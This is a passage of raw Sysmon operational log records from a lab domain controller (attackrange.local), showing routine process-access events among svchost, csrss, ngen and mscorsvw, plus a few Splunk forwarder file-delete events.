14:57:56.623{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-AC0D-00000000BB01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.576{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-AB0D-00000000BB01}4056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.561{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-AB0D-00000000BB01}4056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.561{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-AB0D-00000000BB01}4056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.529{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-AA0D-00000000BB01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.514{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-AA0D-00000000BB01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.514{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-AA0D-00000000BB01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-A90D-00000000BB01}4240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.436{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-A90D-00000000BB01}4240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.436{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-A90D-00000000BB01}4240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.389{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-A80D-00000000BB01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.373{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-A80D-00000000BB01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.373{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-A80D-00000000BB01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.311{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-A70D-00000000BB01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000076455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.311{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5121F5E14B7909290253264D23DC722C,SHA256=060749615BB907D539B50BF37DA7589E1AC73E991CE2967735FF3E929B21E455,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.295{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-A70D-00000000BB01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.295{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-A70D-00000000BB01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.295{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C629686932DEAA7DB1C240347812F1D2,SHA256=74DF605F9D61F07A1B1219A9786A7CF0D8EBD26E00DA27524701BEF0FCFD61E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.295{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF0984C9636F0D46109A4B759D74F0A1,SHA256=3F0CDC4FD0D8BAA553AA9F2CFCB33E78D5D7550743CC332E94E72E0844C2E242,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.233{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-A60D-00000000BB01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.217{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-A60D-00000000BB01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.217{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-A60D-00000000BB01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.170{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-A50D-00000000BB01}5472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.154{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-A50D-00000000BB01}5472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 